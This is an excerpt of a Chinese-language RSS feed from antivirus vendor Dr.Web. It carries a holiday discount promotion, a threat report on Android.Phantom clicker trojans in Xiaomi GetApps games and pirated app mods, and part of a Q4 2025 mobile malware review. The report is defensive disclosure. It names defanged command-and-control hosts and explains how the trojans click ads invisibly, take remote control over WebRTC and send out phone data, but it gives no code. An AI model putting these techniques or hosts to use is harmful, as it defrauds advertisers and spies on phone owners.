两年授权限时优惠30%！</title><link>https://news.drweb.cn/show/?i=15121&amp;lng=cn&amp;c=5</link><pubDate>Fri, 13 Feb 2026 16:58:16 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;为庆祝中国春节并感谢广大用户的支持，我公司诚意推出节日特惠活动！2026年2月13日至24日期间，购买反病毒全面保护解决方案 &lt;a href="https://estore.drweb.cn/home/?c=1&amp;amp;p=24&amp;amp;coupon=CHUNJIE26"&gt;Dr.Web Security Space（1台电脑，2年授权）&lt;/a&gt; 享有限时特别折扣！&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;&lt;strong&gt;活动条件：&lt;/strong&gt;&lt;/p&gt;&lt;ul&gt;&lt;li&gt;产品： Dr.Web Security Space，1台电脑24个月授权。&lt;/li&gt;&lt;li&gt;建议零售价： ¥171&lt;/li&gt;&lt;li&gt;&lt;strong&gt;活动特价： ¥119.70&lt;/strong&gt;&lt;/li&gt;&lt;li&gt;所得优惠： 节省 30%！&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;strong&gt;如何获得折扣？&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;活动期间于我官网线上商店下单时输入促销代码 &lt;strong&gt;CHUNJIE26&lt;/strong&gt;&lt;a href="https://estore.drweb.cn/home/?c=1&amp;amp;p=24&amp;amp;coupon=CHUNJIE26"&gt;即可自动获得折扣&lt;/a&gt;！&lt;/p&gt;&lt;p&gt;&lt;strong&gt;为什么要选择 Dr.Web Security Space？&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;这是一个为您的电脑提供全面保护的「防护罩」，不仅有经典的防病毒入侵功能，还拥有：&lt;/p&gt;&lt;ul&gt;&lt;li&gt;父母控制功能，保障未成年人的上网安全。&lt;/li&gt;&lt;li&gt;阻断网页广告及垃圾邮件的功能。&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;愿新的一年里您的数字世界坚不可摧、安全无虞！也祝各位用户丙午马年万事如意、马到成功，安心畅享网络空间！&lt;br&gt;折扣良机不可错失，快来让您的电脑未来两年都能获得可靠的全面保护吧！&lt;/p&gt;&lt;p&gt;&lt;strong&gt;活动有效期：2026年2月13日至2月24日（含首尾两日）。&lt;/strong&gt;&lt;br&gt;&amp;nbsp;&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15110&amp;lng=cn</guid><title>Android.Phantom家族木马通过游戏和盗版热门应用感染智能手机并利用机器学习和视频流来操纵点击</title><link>https://news.drweb.cn/show/?i=15110&amp;lng=cn&amp;c=5</link><pubDate>Tue, 03 Feb 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;strong&gt;2026年02月03日&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Doctor Web反病毒实验室发现一种新型的点击器木马并对其进行了分析。这些木马有一个共同的特点：或者是由服务器 &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; 直接控制，或者是按照该服务器的命令进行下载并执行。这类恶意软件感染的是安卓智能手机。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;木马传播渠道之一是小米设备的官方应用目录GetApps。&lt;/p&gt;

&lt;div class="img img-two-v same-height mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/01_Android.Phantom.1.png" alt="#drweb"&gt; 
    &lt;/a&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/02_Android.Phantom.1.png" alt="#drweb"&gt;&amp;nbsp;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;我们已发现有多款手机游戏内含恶意软件：CreationMagicWorld（下载量超过32,000次）、CutePetHouse（下载量超过34,000次）、AmazingUnicornParty（下载量超过13,000次）、SakuraDreamAcademy（下载量超过4,000次）、TheftAutoMafia（下载量超过61,000次）和OpenWorldGangsters（下载量超过11,000次）。所有被感染的游戏均开发商都是SHENZHENRUIRENNETWORKCO.,LTD，木马程序嵌入这些应用并与其一同运行。&lt;/p&gt;

&lt;p&gt;这些游戏的最初版本都不含恶意软件。9月28日至29日，该开发商发布了包含的游戏更新则嵌入有木马程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;。该木马程序有两种运行模式，程序代码中分别称为“信号模式（signaling）”和“幻影模式（phantom）”。&lt;/p&gt;

&lt;p&gt;该恶意软件在幻影模式下使用的是用户看不到的基于WebView组件的嵌入式浏览器。在收到来自 &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt; 服务器的指令后，木马会加载要增加点击量的目标网站和名为 “phantom”的JavaScript文件。后者包含一个用于对已加载网站广告自动执行操作的脚本以及TensorFlowJS机器学习框架。此框架的模型是从 &lt;span class="string"&gt;hxxps[:]//app-download[.]cn-wlcb[.]ufileos[.]com&lt;/span&gt; 服务器加载到应用程序目录。在某些特定类型的广告场景下，&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 会将浏览器置于虚拟屏幕并进行截屏。木马使用TensorFlowJS模型分析这些屏幕截图后点击发现的元素。&lt;/p&gt;

&lt;p&gt;在另一种模式，也就是信号模式下，木马利用WebRTC连接到第三方服务器。这中技术可以让浏览器和应用直接建立连接，实时交换数据、音频和视频，无需安装额外的软件。在信号模式下，上面提到的hxxps[:]//dllpgd[.]click充当信号服务器，在WebRTC节点之间建立连接。这个服务器还会决定木马的运行模式。包含目标网站的任务来自 &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; 充当信号服务器，在WebRTC节点之间建立连接。这个服务器还会决定木马的运行模式。包含目标网站的任务来自 &lt;span class="string"&gt;hxxps[:]//playstations[.]click&lt;/span&gt;。然后，&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 会暗中将浏览器所加载网站的虚拟屏幕传输给攻击者。木马让连接的WebRTC节点远程控制虚拟屏幕的浏览器，包括进行点击、滚动、输入或将文本粘贴到输入框。&lt;/p&gt;

&lt;p&gt;10月15/16日上述游戏再次更新。除了 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;，这次更新还增加了模块 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;。这个模块是一个投放器，其中包含远程代码加载器 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.4.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt;，可下载其他几个用于模拟用户在各种网站点击行为的木马。这些模块要比点击器 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;简单，没有运用机器学习或视频流，而只是使用JavaScript点击脚本。&lt;/p&gt;

&lt;p&gt;木马在安卓设备使用WebRTC技术需要连接到一个特殊的JavaAPI库，标准操作系统或下载的应用程序并不包含。因此，木马最初主要以幻影模式运行。而加入模块 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt; 后，木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 获得了使用远程代码加载器 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.4.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt; 下载所需库的能力。&lt;/p&gt;

&lt;p&gt;攻击者还利用其他渠道传播木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt;。其中有音乐流媒体Spotify已解锁高级功能的修改版，托管于多个网站。以下是一些示例：&lt;/p&gt;

&lt;div class="flex justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-3"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/03_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;网站SpotifyPlus&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-3"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/04_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;网站SpotifyPro&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;专门的Telegram频道中也有这个恶意版本存在：&lt;/p&gt;

&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/05_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;SpotifyPro(54400粉丝)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/06_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;SpotifyPlus–Official(15057粉丝)&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;截图中的网站和Telegram频道所托管的Spotify修改版包含 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 以及用于AndroidWebRTC通信的库。&lt;/p&gt;

&lt;p&gt;除了Spotify修改版，攻击者还在其他热门应用（例如YouTube、Deezer、Netflix等）的修改版中植入了木马，托管于一些盗版网站：&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/07_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;网站Apkmody&lt;/i&gt;&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/08_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;i&gt;网站Moddroid&lt;/i&gt;&lt;/p&gt;

&lt;p&gt;网站Moddroid有一个“编辑精选”专区。在列出的20个应用中，只有4个是安全的，其余16个都含有木马 &lt;strong&gt;Android.Phantom&lt;/strong&gt;。这两个网站上的应用都来自同一个CDN服务器 &lt;span class="string"&gt;hxxps[:]//cdn[.]topmongo[.]com&lt;/span&gt;。这些网站都有自己的Telegram频道，用户在这些频道下载的是感染了木马的版本：&lt;/p&gt;

&lt;div class="flex flex-col md:flex-row justify-center gap-3"&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/09_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;Moddroid.com（87653粉丝）&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
    &lt;div class="flex flex-col gap-1"&gt;
        &lt;div class="img"&gt;
            &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.png" data-fancybox=""&gt;
                &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/10_Android.Phantom.1.png" alt="#drweb"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;p class="text-center"&gt;&lt;i&gt;ApkmodyChat（6297粉丝）&lt;/i&gt;&lt;/p&gt;
    &lt;/div&gt;
&lt;/div&gt;

&lt;p class="mt-5"&gt;犯罪分子还利用Discord服务器进行非法活动。其中规模最大的是SpotifyX，拥有约24,000名订阅者。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/11_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/12_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;Discord服务器管理员甚至在不加掩饰地直接提供感染病毒的版本。例如，在上面的截图中，服务器管理员建议下载音乐流媒体修改版Deezer，而不是Spotify，称Spotify已经停止运行。
使用图中链接下载的是恶意版本，其代码受商业打包软件的保护，里面藏着的是木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt;。这是一个远程代码加载器，在收到来自 &lt;span class="string"&gt;hxxps[:]//dllpgd[.]click&lt;/span&gt; 服务器的指令后会下载我们在上面介绍过的 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt;、&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt; 和间谍软件 &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt;。这个间谍软件会将设备信息发送给攻击者，包括电话号码、地理位置和已安装应用的列表。&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.png" data-fancybox=""&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2026/january/android_phantom/13_Android.Phantom.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;这张服务器截图显示的是被感染设备用所户使用的语言。要访问非英语聊天，用户需选择相应的语言标志。受影响最多的用户所使用的语言位西班牙语、法语、德语、波兰语和意大利语，当然还有服务器语言英语。同时需要注意的是，服务器管理员并没有为很多亚洲国家/地区提供本土语言聊天的功能。&lt;/p&gt;

&lt;p&gt;这些木马会给被感染设备的用户造成严重损害。以下是一些可能的后果：&lt;/p&gt;

&lt;ul class="list"&gt;
    &lt;li&gt;&lt;strong&gt;无意中成为帮凶。&lt;/strong&gt;被感染手机可能被用做进行DDoS攻击的僵尸，使用户在不知情的情况下成为网络犯罪的帮凶。&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;非法活动。&lt;/strong&gt;攻击者可以利用被感染设备进行非法网络活动，如进行诈骗活动或发送垃圾邮件。&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;电池和流量消耗增加。&lt;/strong&gt;未经授权的活动会消耗电池电量并消耗网络流量。&lt;/li&gt;
    &lt;li&gt;&lt;strong&gt;个人数据泄露。&lt;/strong&gt; &lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; 是一种间谍软件，可以传输有关设备及用户的数据。&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;此类木马病毒对未安装最新反病毒软件的安卓移动设备用户构成威胁。目前俄罗斯用户在注册外国应用或支付订阅费用时会受到，促使他们寻求其他途径（通常是半合法途径）来获取这些公司的服务。这正中病毒编写者的下怀，因为用户要被迫承担风险并信任可疑的选项。对网络安全知之甚少而一心只想玩游戏、听音乐或看视频的未成年人尤其容易成为受害者。&lt;/p&gt;

&lt;p&gt;我们建议您不要从可疑的网站和渠道下载任何盗版应用。通常，验证修改版或应用的来源需要时间、经验和专业知识。因此，确保您和您家人的网络安全的最佳选择是使用Dr.WebSecuritySpace移动设备保护版，可以保护的不仅是您的智能手机，还可以保护其他智能设备，包括游戏机、平板电脑和智能电视。&lt;/p&gt;


&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Android.Phantom/README.adoc"&gt;失陷指标&lt;/a&gt;&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.1.origin&lt;/b&gt;&lt;/a&gt; 更多详情&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.2.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.2.origin&lt;/b&gt;&lt;/a&gt; 更多详情&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.3&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.3&lt;/b&gt;&lt;/a&gt; 更多详情&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.4.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.4.origin&lt;/b&gt;&lt;/a&gt; 更多详情&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5&lt;/b&gt;&lt;/a&gt; 更多详情&lt;br /&gt;
&lt;a href="https://vms.drweb.cn/search/?q=Android.Phantom.5.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Phantom.5.origin&lt;/b&gt;&lt;/a&gt; 更多详情&lt;/p&gt;</description></item><item><guid>https://news.drweb.cn/show/?i=15101&amp;lng=cn</guid><title>DoctorWeb：2025年第四季度移动设备病毒活动综述</title><link>https://news.drweb.cn/show/?i=15101&amp;lng=cn&amp;c=5</link><pubDate>Mon, 12 Jan 2026 00:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;2026.01.12&lt;/b&gt;&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;根据移动设备保护产品Dr.WebSecuritySpace的侦测统计，2025年第四季度侦测最多的是会不断显示广告的广告木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; 和 &lt;a href="https://vms.drweb.cn/search/?q=Android.HiddenAds&amp;lng=cn"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;，但与上一季度相比活跃程度有所变化：前者在受保护设备上的侦测率降低了43.24%，后者降低了18.06%。紧随其后的是Android.Siggen家族木马，族包含具有不同功能的恶意应用程序，侦测率也略有降低，为27.47%。&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;与此同时，银行木马的活动显著增加，用户遭遇率增加了65.52%，增长主要是因 &lt;a href="https://vms.drweb.cn/search/?q=Android.Banker&amp;lng=cn"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; 家族木马的传播。这些恶意程序会拦截用于确认银行交易的一次性验证码短信，还可以模仿合法银行软件的外观并显示钓鱼窗口。&lt;/p&gt;

&lt;p&gt;不良程序中最常见的是经CloudInject云服务修改后的安卓应用程序（Dr.Web反病毒软件将其侦测为 &lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;）。该服务用于向应用程序添加危险的系统权限和混淆代码，导致应用程序的功能无法控制。此外，还经常侦测到一些虚假的杀毒软件，例如&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;，这类软件会侦测到并不存在的威胁，并欺骗用户购买完整版本才能“清除”威胁；还有一种是 &lt;a href="https://vms.drweb.cn/search/?q=Program.FakeMoney&amp;lng=cn"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;，这类软件谎称用户通过完成各种任务可以赚钱。&lt;/p&gt;

&lt;p&gt;第四季度最常见的风险软件是 &lt;b&gt;Tool.NPMod&lt;/b&gt;，是使用NP Manager工具修改过的应用程序。这个工具会混淆修改后的代码，并添加一个特殊模块，让修改后的应用能够绕过数字签名验证。在广告应用方面，属于&lt;a href="https://vms.drweb.cn/search/?q=Adware.Adpush&amp;lng=cn"&gt;&lt;b&gt;Adware.Adpush&lt;/b&gt;&lt;/a&gt; 家族的仍然最多，是开发者可嵌入到软件中显示广告通知的特殊软件模块。&lt;/p&gt;

&lt;p&gt;10月份，我公司专家&lt;a href="https://news.drweb.cn/show/?i=15076" target="_blank"&gt;通报了&lt;/a&gt;危险的后门程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt;，攻击者将其嵌入到TelegramX即时通讯软件的非官方修改版中，并通过恶意网站和第三方安卓应用商店进行传播。这个恶意软件会窃取Telegram帐户的登录名和密码以及其他敏感数据。此外，还让网络犯罪分子能够控制受害者的账户，并暗中以受害者名义执行各种操作，如订阅或退出Telegram频道、隐藏新授权的设备、隐藏特定消息等等。&lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; 可通过Redis数据库进行控制的，这是此前安卓威胁中从未出现过的功能。该后门总共感染了约58,000个设备，包括约3,000种不同型号的智能手机、平板电脑、电视机顶盒以及搭载安卓车载电脑的汽车。&lt;/p&gt;

&lt;p&gt;在过去一个季度中，我公司的反病毒实验室在Google Play目录中侦测到了新的恶意软件，包括为受害者注册付费服务的木马 &lt;a href="https://vms.drweb.cn/search/?q=Android.Joker&amp;lng=cn"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt; 以及用于欺诈活动的各种伪造程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;。这些程序的总下载量至少为263,000次。&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;第四季度主要移动安全事件：&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;广告木马仍然是最常见的安卓威胁&lt;/li&gt;
        &lt;li&gt;银行木马攻击有所增加&lt;/li&gt;
        &lt;li&gt;嵌入在TelegramX的修改版中的危险后门程序 &lt;a href="https://vms.drweb.cn/search/?q=Android.Backdoor.Baohuo.1.origin&amp;lng=cn"&gt;&lt;b&gt;Android.Backdoor.Baohuo.1.origin&lt;/b&gt;&lt;/a&gt; 正在传播&lt;/li&gt;
        &lt;li&gt;GooglePlay目录再次出现新威胁&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;最常见的恶意软件&lt;/h3&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/01_malware_q4_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.MobiDash&amp;lng=cn"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7859&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;显示烦人广告的木马程序，是一个软件模块，软件开发人员可将其嵌入到应用程序中。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.FakeApp&amp;lng=cn"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;能够下载其设置中指定的网站的木马，已知变种加载的是在线赌场。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Click&amp;lng=cn"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测恶意WhatsApp Messenger修改版，这些修改版在用户不知情的情况下在后台加载各种网站。&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Packed.57.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测混淆器，该混淆器用于保护恶意应用程序（如某些版本的银行木马 &lt;b&gt;Android.SpyMax&lt;/b&gt;）。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Android.Triada&amp;lng=cn"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5847&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测用于保护木马免受分析和侦测的 &lt;a href="https://vms.drweb.cn/search/?q=Android.Triada&amp;lng=cn"&gt;&lt;b&gt;Android.Triada&lt;/b&gt;&lt;/a&gt; 木马加壳程序。攻击者通常将其与直接嵌入了木马的恶意Telegram通讯模块结合使用。&lt;/dd&gt;
&lt;/dl&gt;

&lt;p&gt;&lt;b&gt;最常见的不良软件&lt;/b&gt;&lt;/p&gt;

&lt;div class="img mb-3"&gt;
    &lt;a href="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.cn/static/new-www/news/2025/december/review_mobile_q4/02_unwanted_q_2025_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Program.CloudInject&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测经CloudInject云服务和同名安卓工具修改的安卓应用程序（归类为 &lt;a href="https://vms.drweb.cn/search/?q=Tool.CloudInject&amp;lng=cn"&gt;&lt;b&gt;Tool.CloudInject&lt;/b&gt;&lt;/a&gt; 添加至Dr.Web病毒库）。此类程序在远程服务器上进行修改，而有用户（修改者）无法控制修改过程中到底内置了什么。此外，应用程序还会得到一些危险的权限。修改后用户可以远程控制这些程序，包括锁定、显示自定义对话框、跟踪其他软件的安装和删除等。&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.cn/search/?q=Program.FakeAntiVirus&amp;lng=cn"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;侦测假冒反病毒软件运行的广告应用。这种应用汇谎报发现安全威胁，诱骗用户支付费用购买完整版本。&lt;/dd&gt;
